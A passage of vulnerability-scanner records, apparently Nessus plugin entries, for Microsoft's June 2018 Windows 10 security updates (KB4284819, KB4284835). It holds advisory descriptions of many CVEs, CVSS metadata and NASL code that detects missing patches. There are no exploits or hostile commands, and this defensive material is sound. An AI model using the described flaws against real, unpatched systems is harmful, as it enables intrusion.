vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8227, CVE-2018-8229)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8111,\n CVE-2018-8236)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. (CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)", "edition": 21, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "title": "KB4284819: Windows 10 Version 1709 and Windows Server Version 1709 June 2018 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8226", "CVE-2018-8218", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8140", "CVE-2018-8111", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-8225", "CVE-2018-0871", "CVE-2018-8175"], "modified": "2018-06-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_JUN_4284819.NASL", "href": "https://www.tenable.com/plugins/nessus/110485", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110485);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0871\",\n \"CVE-2018-0978\",\n \"CVE-2018-0982\",\n \"CVE-2018-1036\",\n \"CVE-2018-1040\",\n \"CVE-2018-8111\",\n \"CVE-2018-8113\",\n \"CVE-2018-8121\",\n \"CVE-2018-8140\",\n \"CVE-2018-8169\",\n \"CVE-2018-8175\",\n \"CVE-2018-8201\",\n \"CVE-2018-8205\",\n \"CVE-2018-8207\",\n \"CVE-2018-8208\",\n \"CVE-2018-8209\",\n \"CVE-2018-8210\",\n \"CVE-2018-8211\",\n \"CVE-2018-8212\",\n \"CVE-2018-8213\",\n \"CVE-2018-8214\",\n \"CVE-2018-8215\",\n \"CVE-2018-8218\",\n \"CVE-2018-8219\",\n \"CVE-2018-8221\",\n \"CVE-2018-8225\",\n \"CVE-2018-8226\",\n \"CVE-2018-8227\",\n \"CVE-2018-8229\",\n \"CVE-2018-8231\",\n \"CVE-2018-8234\",\n \"CVE-2018-8235\",\n \"CVE-2018-8236\",\n \"CVE-2018-8239\",\n \"CVE-2018-8251\",\n \"CVE-2018-8267\"\n );\n script_bugtraq_id(\n 104326,\n 104328,\n 104331,\n 104333,\n 104335,\n 104336,\n 104338,\n 104339,\n 104340,\n 104343,\n 104353,\n 104354,\n 104356,\n 104359,\n 104360,\n 104361,\n 104364,\n 104365,\n 104368,\n 104369,\n 104373,\n 104379,\n 104380,\n 104382,\n 104389,\n 104391,\n 104392,\n 104393,\n 104394,\n 104395,\n 104398,\n 104401,\n 104402,\n 104404,\n 104406,\n 104407\n );\n script_xref(name:\"MSKB\", value:\"4284819\");\n script_xref(name:\"MSFT\", value:\"MS18-4284819\");\n\n script_name(english:\"KB4284819: Windows 10 Version 1709 and Windows Server Version 1709 June 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4284819.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2018-8218)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An denial of service vulnerability exists when Windows\n NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n An attacker who successfully exploited the vulnerability\n could cause a denial of service. (CVE-2018-8175)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8221)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - An Elevation of Privilege vulnerability exists when\n Cortana retrieves data from user input services without\n consideration for status. An attacker who successfully\n exploited the vulnerability could execute commands with\n elevated permissions. (CVE-2018-8140)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8227, CVE-2018-8229)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8111,\n CVE-2018-8236)\n\n - An information disclosure vulnerability exists when\n Windows allows a normal user to access the Wireless LAN\n profile of an administrative user. An authenticated\n attacker who successfully exploited the vulnerability\n could access the Wireless LAN profile of an\n administrative user, including passwords for wireless\n networks. An attacker would need to log on to the\n affected system and run a specific command. The security\n update addresses the vulnerability by changing the way\n that Windows enforces access permissions to Wireless LAN\n profiles. (CVE-2018-8209)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. (CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)\");\n # https://support.microsoft.com/en-us/help/4284819/windows-10-update-kb4284819\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?21a2fb0a\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4284819.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8231\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-06\";\nkbs = make_list('4284819');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"06_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4284819])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:14", "description": "The remote Windows host is missing security update 4284835.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An denial of service vulnerability exists when Windows\n NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n An attacker who successfully exploited the vulnerability\n could cause a denial of service. (CVE-2018-8175)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8221)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - An Elevation of Privilege vulnerability exists when\n Cortana retrieves data from user input services without\n consideration for status. An attacker who successfully\n exploited the vulnerability could execute commands with\n elevated permissions. (CVE-2018-8140)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8233)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8227, CVE-2018-8229)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8110,\n CVE-2018-8236)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. (CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)", "edition": 21, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "title": "KB4284835: Windows 10 Version 1803 and Windows Server Version 1803 June 2018 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-8233", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8110", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8140", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-8225", "CVE-2018-0871", "CVE-2018-8175"], "modified": "2018-06-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS18_JUN_4284835.NASL", "href": "https://www.tenable.com/plugins/nessus/110487", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110487);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2018-0871\",\n \"CVE-2018-0978\",\n \"CVE-2018-0982\",\n \"CVE-2018-1036\",\n \"CVE-2018-1040\",\n \"CVE-2018-8110\",\n \"CVE-2018-8113\",\n \"CVE-2018-8121\",\n \"CVE-2018-8140\",\n \"CVE-2018-8169\",\n \"CVE-2018-8175\",\n \"CVE-2018-8201\",\n \"CVE-2018-8205\",\n \"CVE-2018-8207\",\n \"CVE-2018-8208\",\n \"CVE-2018-8210\",\n \"CVE-2018-8211\",\n \"CVE-2018-8212\",\n \"CVE-2018-8213\",\n \"CVE-2018-8214\",\n \"CVE-2018-8215\",\n \"CVE-2018-8219\",\n \"CVE-2018-8221\",\n \"CVE-2018-8225\",\n \"CVE-2018-8226\",\n \"CVE-2018-8227\",\n \"CVE-2018-8229\",\n \"CVE-2018-8231\",\n \"CVE-2018-8233\",\n \"CVE-2018-8234\",\n \"CVE-2018-8235\",\n \"CVE-2018-8236\",\n \"CVE-2018-8239\",\n \"CVE-2018-8251\",\n \"CVE-2018-8267\"\n );\n script_bugtraq_id(\n 104326,\n 104328,\n 104330,\n 104331,\n 104333,\n 104336,\n 104338,\n 104339,\n 104340,\n 104343,\n 104353,\n 104354,\n 104356,\n 104359,\n 104360,\n 104361,\n 104364,\n 104365,\n 104368,\n 104369,\n 104373,\n 104379,\n 104380,\n 104382,\n 104383,\n 104389,\n 104391,\n 104392,\n 104394,\n 104395,\n 104398,\n 104401,\n 104404,\n 104406,\n 104407\n );\n script_xref(name:\"MSKB\", value:\"4284835\");\n script_xref(name:\"MSFT\", value:\"MS18-4284835\");\n\n script_name(english:\"KB4284835: Windows 10 Version 1803 and Windows Server Version 1803 June 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n 